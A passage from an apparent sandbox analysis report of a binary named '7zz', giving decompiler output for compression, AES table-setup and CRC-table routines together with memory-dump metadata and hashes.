									_t222 = _t198 | _t198 & _v12;
									_t149 = _t123 | (0x00000001 << _v40) - 0x00000001 & _v16;
									_t205[_t212 + 1] = (_t222 << 0x00000020 | _t149) >> 8;
									_t205[_t212] = _t149;
									_t205[_t212 + 2] = (_t222 << 0x00000020 | _t149) >> 0x10;
									_t205[_t212 + 3] = (_t222 << 0x00000020 | _t149) >> 0x18;
									_t205[_t212 + 4] = _t222;
									_t205[_t212 + 5] = _t222 >> 8;
								}
							}
							_t208 = _v36 + 1;
							_t102 = _v32 + 0x29;
							_v36 = _t208;
							_v32 = _t102;
						} while (_t208 < 3);
						_t132 = _v44 + 0x10;
						_t205 =  &(_t205[0x10]);
						_v44 = _t132;
					} while (_t132 <= _v20);
					return _t132;
				} else {
					return 0;
				}
			}



































                                                                                                                                    0x00458b36
                                                                                                                                    0x00458b4d
                                                                                                                                    0x00458b51
                                                                                                                                    0x00458b59
                                                                                                                                    0x00458b5b
                                                                                                                                    0x00458b60
                                                                                                                                    0x00458b6d
                                                                                                                                    0x00458b72
                                                                                                                                    0x00458b74
                                                                                                                                    0x00458b78
                                                                                                                                    0x00458b7c
                                                                                                                                    0x00458b80
                                                                                                                                    0x00458b86
                                                                                                                                    0x00458b8b
                                                                                                                                    0x00458b95
                                                                                                                                    0x00458b98
                                                                                                                                    0x00458b9d
                                                                                                                                    0x00458bae
                                                                                                                                    0x00458bb2
                                                                                                                                    0x00458bb9
                                                                                                                                    0x00458bbf
                                                                                                                                    0x00458bc3
                                                                                                                                    0x00458bca
                                                                                                                                    0x00458bd0
                                                                                                                                    0x00458bd4
                                                                                                                                    0x00458bdb
                                                                                                                                    0x00458be1
                                                                                                                                    0x00458be5
                                                                                                                                    0x00458beb
                                                                                                                                    0x00458bed
                                                                                                                                    0x00458bf1
                                                                                                                                    0x00458bf7
                                                                                                                                    0x00458bfb
                                                                                                                                    0x00458bfd
                                                                                                                                    0x00458c01
                                                                                                                                    0x00458c05
                                                                                                                                    0x00458c09
                                                                                                                                    0x00458c0e
                                                                                                                                    0x00458c1a
                                                                                                                                    0x00458c21
                                                                                                                                    0x00458c5a
                                                                                                                                    0x00458c62
                                                                                                                                    0x00458c76
                                                                                                                                    0x00458c64
                                                                                                                                    0x00458c6a
                                                                                                                                    0x00458c6a
                                                                                                                                    0x00458c78
                                                                                                                                    0x00458cb4
                                                                                                                                    0x00458cb6
                                                                                                                                    0x00458ccb
                                                                                                                                    0x00458cd4
                                                                                                                                    0x00458cd6
                                                                                                                                    0x00458ce0
                                                                                                                                    0x00458cf1
                                                                                                                                    0x00458cfd
                                                                                                                                    0x00458d09
                                                                                                                                    0x00458d0d
                                                                                                                                    0x00458d11
                                                                                                                                    0x00458d11
                                                                                                                                    0x00458c21
                                                                                                                                    0x00458d1d
                                                                                                                                    0x00458d1e
                                                                                                                                    0x00458d21
                                                                                                                                    0x00458d25
                                                                                                                                    0x00458d29
                                                                                                                                    0x00458d36
                                                                                                                                    0x00458d39
                                                                                                                                    0x00458d3c
                                                                                                                                    0x00458d40
                                                                                                                                    0x00458d51
                                                                                                                                    0x00458b38
                                                                                                                                    0x00458b3d
                                                                                                                                    0x00458b3d

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
                                                                                                                                    • Instruction ID: fa9aeb9e0725e4ffef27b0fed8173ebd3e95ce29c77f6e3ebb7612827f398593
                                                                                                                                    • Opcode Fuzzy Hash: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
                                                                                                                                    • Instruction Fuzzy Hash: 2C510AB2B087514BD308DE6DCC9073AB6D2EBD4304F48863EE496D3385EA78DA1987D5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00459F80 Relevance: .2, Instructions: 154COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E00459F80(void* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __esi;
				unsigned int _t59;
				unsigned int _t77;
				void* _t78;
				signed int _t79;
				intOrPtr _t83;
				intOrPtr* _t92;
				void* _t107;
				intOrPtr _t120;
				intOrPtr _t121;
				unsigned int _t127;
				signed int _t128;
				intOrPtr _t129;
				void* _t130;
				intOrPtr _t132;
				intOrPtr _t133;

				_t127 = __edx;
				_t130 = __ecx;
				if(__edx <= 0xc0000000) {
					_t59 = __edx >> 1;
					if(__edx > 0x80000000) {
						_t59 = __edx >> 2;
					}
					_t132 = _a8;
					 *((intOrPtr*)(_t130 + 0x40)) = _t127 + _a4 + 1;
					 *((intOrPtr*)(_t130 + 0x44)) = _a12 + _t132;
					_t92 = _a16;
					if(E00459C90(_t92, _t130, (_a4 + _t132 + _a12 >> 1) + _t59 + 0x80000) == 0) {
						_t133 = 0;
						goto L30;
					} else {
						_t120 =  *((intOrPtr*)(_t130 + 0x48));
						 *((intOrPtr*)(_t130 + 0x1c)) = _t132;
						_t133 = 0;
						_a16 = _t127 + 1;
						 *((intOrPtr*)(_t130 + 0x60)) = 0;
						if(_t120 != 2) {
							_t77 = ((_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002) >> 0x00000004 | 0x01fffe00) >> 0x00000008 | _t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002) >> 0x00000004) >> 1;
							if(_t77 > 0x1000000) {
								if(_t120 != 3) {
									_t77 = _t77 >> 1;
								} else {
									_t77 = 0xffffff;
								}
							}
						} else {
							_t77 = 0xffff;
						}
						 *(_t130 + 0x28) = _t77;
						_t78 = _t77 + 1;
						if(_t120 > 2) {
							 *((intOrPtr*)(_t130 + 0x60)) = 0x400;
						}
						if(_t120 > 3) {
							 *((intOrPtr*)(_t130 + 0x60)) =  *((intOrPtr*)(_t130 + 0x60)) + 0x10000;
						}
						if(_t120 > 4) {
							 *((intOrPtr*)(_t130 + 0x60)) =  *((intOrPtr*)(_t130 + 0x60)) + 0x100000;
						}
						_t79 = _t78 +  *((intOrPtr*)(_t130 + 0x60));
						_t107 =  *(_t130 + 0x64) +  *((intOrPtr*)(_t130 + 0x68));
						_t121 = _a16;
						 *((intOrPtr*)(_t130 + 0x5c)) = _t127;
						 *(_t130 + 0x64) = _t79;
						 *((intOrPtr*)(_t130 + 0x18)) = _t121;
						if( *((intOrPtr*)(_t130 + 0x54)) != _t133) {
							_t121 = _t121 + _t121;
						}
						 *((intOrPtr*)(_t130 + 0x68)) = _t121;
						_t128 = _t79 + _t121;
						if( *((intOrPtr*)(_t130 + 0x20)) == _t133 || _t107 != _t128) {
							 *((intOrPtr*)( *((intOrPtr*)(_t92 + 4))))();
							 *((intOrPtr*)(_t130 + 0x20)) = _t133;
							if(_t128 * 4 >> 2 == _t128) {
								_t83 =  *((intOrPtr*)( *_t92))();
							} else {
								_t83 = 0;
							}
							 *((intOrPtr*)(_t130 + 0x20)) = _t83;
							if(_t83 == _t133) {
								L30:
								 *((intOrPtr*)( *((intOrPtr*)(_t92 + 4))))();
								 *((intOrPtr*)(_t130 + 0x20)) = _t133;
								if( *((intOrPtr*)(_t130 + 0x4c)) == _t133) {
									 *((intOrPtr*)( *((intOrPtr*)(_t92 + 4))))();
									 *((intOrPtr*)(_t130 + 0x30)) = _t133;
								}
								return 0;
							} else {
								 *((intOrPtr*)(_t130 + 0x24)) = _t83 +  *(_t130 + 0x64) * 4;
								goto L28;
							}
						} else {
							L28:
							return 1;
						}
					}
				} else {
					_t129 = _a16;
					 *((intOrPtr*)( *((intOrPtr*)(_t129 + 4))))();
					 *((intOrPtr*)(__ecx + 0x20)) = 0;
					if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 4))))();
						 *((intOrPtr*)(__ecx + 0x30)) = 0;
					}
					return 0;
				}
			}




















                                                                                                                                    0x00459f83
                                                                                                                                    0x00459f85
                                                                                                                                    0x00459f8d
                                                                                                                                    0x00459fbe
                                                                                                                                    0x00459fc6
                                                                                                                                    0x00459fca
                                                                                                                                    0x00459fca
                                                                                                                                    0x00459fd6
                                                                                                                                    0x00459fda
                                                                                                                                    0x00459ff1
                                                                                                                                    0x00459ff4
                                                                                                                                    0x0045a000
                                                                                                                                    0x0045a0f4
                                                                                                                                    0x00000000
                                                                                                                                    0x0045a006
                                                                                                                                    0x0045a006
                                                                                                                                    0x0045a009
                                                                                                                                    0x0045a00c
                                                                                                                                    0x0045a011
                                                                                                                                    0x0045a015
                                                                                                                                    0x0045a01b
                                                                                                                                    0x0045a047
                                                                                                                                    0x0045a04e
                                                                                                                                    0x0045a053
                                                                                                                                    0x0045a05c
                                                                                                                                    0x0045a055
                                                                                                                                    0x0045a055
                                                                                                                                    0x0045a055
                                                                                                                                    0x0045a053
                                                                                                                                    0x0045a01d
                                                                                                                                    0x0045a01d
                                                                                                                                    0x0045a01d
                                                                                                                                    0x0045a05e
                                                                                                                                    0x0045a061
                                                                                                                                    0x0045a065
                                                                                                                                    0x0045a067
                                                                                                                                    0x0045a067
                                                                                                                                    0x0045a071
                                                                                                                                    0x0045a073
                                                                                                                                    0x0045a073
                                                                                                                                    0x0045a07d
                                                                                                                                    0x0045a07f
                                                                                                                                    0x0045a07f
                                                                                                                                    0x0045a089
                                                                                                                                    0x0045a08c
                                                                                                                                    0x0045a08f
                                                                                                                                    0x0045a093
                                                                                                                                    0x0045a096
                                                                                                                                    0x0045a099
                                                                                                                                    0x0045a09f
                                                                                                                                    0x0045a0a1
                                                                                                                                    0x0045a0a1
                                                                                                                                    0x0045a0a3
                                                                                                                                    0x0045a0a6
                                                                                                                                    0x0045a0ae
                                                                                                                                    0x0045a0b9
                                                                                                                                    0x0045a0c7
                                                                                                                                    0x0045a0cc
                                                                                                                                    0x0045a0d6
                                                                                                                                    0x0045a0ce
                                                                                                                                    0x0045a0ce
                                                                                                                                    0x0045a0ce
                                                                                                                                    0x0045a0d8
                                                                                                                                    0x0045a0dd
                                                                                                                                    0x0045a0f6
                                                                                                                                    0x0045a0fe
                                                                                                                                    0x0045a100
                                                                                                                                    0x0045a106
                                                                                                                                    0x0045a110
                                                                                                                                    0x0045a112
                                                                                                                                    0x0045a112
                                                                                                                                    0x0045a11b
                                                                                                                                    0x0045a0df
                                                                                                                                    0x0045a0e5
                                                                                                                                    0x00000000
                                                                                                                                    0x0045a0e5
                                                                                                                                    0x0045a0e8
                                                                                                                                    0x0045a0e8
                                                                                                                                    0x0045a0f1
                                                                                                                                    0x0045a0f1
                                                                                                                                    0x0045a0ae
                                                                                                                                    0x00459f8f
                                                                                                                                    0x00459f8f
                                                                                                                                    0x00459f9b
                                                                                                                                    0x00459f9f
                                                                                                                                    0x00459fa5
                                                                                                                                    0x00459faf
                                                                                                                                    0x00459fb1
                                                                                                                                    0x00459fb1
                                                                                                                                    0x00459fb9
                                                                                                                                    0x00459fb9

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
                                                                                                                                    • Instruction ID: fd88af4a55426da6948f54a871f8da9c8cc7ad7d325161158fb5f24926afe266
                                                                                                                                    • Opcode Fuzzy Hash: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
                                                                                                                                    • Instruction Fuzzy Hash: CE512B75610B098FC724CF29C48066BB3E2FB88305B148A2ED99787B86DB75E859CB45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00456830 Relevance: .1, Instructions: 141COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E00456830() {
				char _t25;
				signed int _t30;
				signed int _t43;
				signed int _t44;
				void* _t51;
				signed int _t60;
				signed int _t63;
				signed int _t69;
				signed int _t71;
				signed int _t83;
				signed int _t98;
				signed int _t99;
				signed int _t123;
				signed int _t127;
				signed int _t130;
				signed int _t133;

				_t25 = 0;
				do {
					_t1 = _t25 + 0x48dc78; // 0x7b777c63
					 *((char*)(( *_t1 & 0x000000ff) + 0x493568)) = _t25;
					_t25 = _t25 + 1;
				} while (_t25 < 0x100);
				_t130 = 0;
				do {
					_t3 = _t130 + 0x48dc78; // 0x7b777c63
					_t63 =  *_t3 & 0x000000ff;
					asm("sbb eax, eax");
					_t30 = ( ~(_t63 & 0x80) & 0x0000001b ^ _t63 + _t63) & 0x000000ff;
					_t123 = _t30 ^ _t63;
					 *(0x491568 + _t130 * 4) = ((_t123 << 0x00000008 | _t63) << 0x00000008 | _t63) << 0x00000008 | _t30;
					_t7 = _t130 + 0x493568; // 0xd56a0952
					_t133 =  *_t7 & 0x000000ff;
					_t83 = _t63 << 8;
					 *(0x492168 + _t130 * 4) = ((_t30 << 0x00000008 | _t123) << 0x00000008 | _t63) << 0x00000008 | _t63;
					asm("sbb eax, eax");
					 *(0x491d68 + _t130 * 4) = ((_t83 | _t30) << 0x00000008 | _t123) << 0x00000008 | _t63;
					_t43 = ( ~(_t133 & 0x80) & 0x0000001b ^ _t133 + _t133) & 0x000000ff;
					asm("sbb ecx, ecx");
					_t69 = ( ~(_t43 & 0x80) & 0x0000001b ^ _t43 + _t43) & 0x000000ff;
					asm("sbb edx, edx");
					_t98 = ( ~(_t69 & 0x80) & 0x0000001b ^ _t69 + _t69) & 0x000000ff;
					 *(0x491968 + _t130 * 4) = ((_t83 | _t63) << 0x00000008 | _t30) << 0x00000008 | _t123;
					_t99 = _t98 ^ _t69;
					_t127 = _t98 ^ _t43 ^ _t133;
					_t44 = _t43 ^ _t99;
					_t60 = _t98 ^ _t133;
					_t71 = _t99 ^ _t133;
					 *(0x492568 + _t130 * 4) = ((_t127 << 0x00000008 | _t71) << 0x00000008 | _t60) << 0x00000008 | _t44;
					 *(0x492968 + _t130 * 4) = ((_t71 << 0x00000008 | _t60) << 0x00000008 | _t44) << 0x00000008 | _t127;
					 *(0x492d68 + _t130 * 4) = ((_t60 << 0x00000008 | _t44) << 0x00000008 | _t127) << 0x00000008 | _t71;
					 *(0x493168 + _t130 * 4) = ((_t44 << 0x00000008 | _t127) << 0x00000008 | _t71) << 0x00000008 | _t60;
					_t130 = _t130 + 1;
				} while (_t130 < 0x100);
				 *0x495a00 = 0x46ae60;
				 *0x495a08 = 0x46aec0;
				 *0x495a04 = 0x46af50;
				_t51 = E00459790();
				if(_t51 != 0) {
					 *0x495a00 = 0x472940;
					 *0x495a08 = E004727F0;
					 *0x495a04 = 0x4729b0;
					return _t51;
				}
				return _t51;
			}



















                                                                                                                                    0x0046afe0
                                                                                                                                    0x0046afe2
                                                                                                                                    0x0046afe2
                                                                                                                                    0x0046afe9
                                                                                                                                    0x0046afef
                                                                                                                                    0x0046aff0
                                                                                                                                    0x0046affb
                                                                                                                                    0x0046b000
                                                                                                                                    0x0046b000
                                                                                                                                    0x0046b000
                                                                                                                                    0x0046b011
                                                                                                                                    0x0046b01b
                                                                                                                                    0x0046b022
                                                                                                                                    0x0046b035
                                                                                                                                    0x0046b03c
                                                                                                                                    0x0046b03c
                                                                                                                                    0x0046b045
                                                                                                                                    0x0046b06c
                                                                                                                                    0x0046b081
                                                                                                                                    0x0046b083
                                                                                                                                    0x0046b093
                                                                                                                                    0x0046b0a2
                                                                                                                                    0x0046b0ac
                                                                                                                                    0x0046b0bc
                                                                                                                                    0x0046b0c6
                                                                                                                                    0x0046b0ce
                                                                                                                                    0x0046b0d7
                                                                                                                                    0x0046b0db
                                                                                                                                    0x0046b0df
                                                                                                                                    0x0046b0e3
                                                                                                                                    0x0046b0e5
                                                                                                                                    0x0046b0f6
                                                                                                                                    0x0046b10e
                                                                                                                                    0x0046b135
                                                                                                                                    0x0046b13c
                                                                                                                                    0x0046b143
                                                                                                                                    0x0046b144
                                                                                                                                    0x0046b150
                                                                                                                                    0x0046b15a
                                                                                                                                    0x0046b164
                                                                                                                                    0x0046b16e
                                                                                                                                    0x0046b179
                                                                                                                                    0x0046b17b
                                                                                                                                    0x0046b185
                                                                                                                                    0x0046b18f
                                                                                                                                    0x00000000
                                                                                                                                    0x0046b18f
                                                                                                                                    0x0046b199

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4d037a9f2a6bac70cdbc0ea4a6beeae294910fb94d9119d9e185bc861c6541ff
                                                                                                                                    • Instruction ID: 64b7cb02cb4575982e1680b9360a4aaf235b5430a9cb7fa29c26ced03b2a631a
                                                                                                                                    • Opcode Fuzzy Hash: 4d037a9f2a6bac70cdbc0ea4a6beeae294910fb94d9119d9e185bc861c6541ff
                                                                                                                                    • Instruction Fuzzy Hash: BA41D471B20A201AB30CCF3A8CC41662BC3D7CA39A745C73EC595C66D9DABDC517C6A8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004217DA Relevance: .1, Instructions: 119COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                    			E004217DA() {
				signed int _t63;
				signed int _t64;
				signed int _t114;

				_t114 = 0;
				do {
					asm("adc ecx, 0xffffffff");
					asm("adc esi, 0xffffffff");
					asm("adc ecx, 0xffffffff");
					asm("adc esi, 0xffffffff");
					asm("adc ecx, 0xffffffff");
					asm("adc esi, 0xffffffff");
					asm("adc ecx, 0xffffffff");
					_t63 =  !((( !((( !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  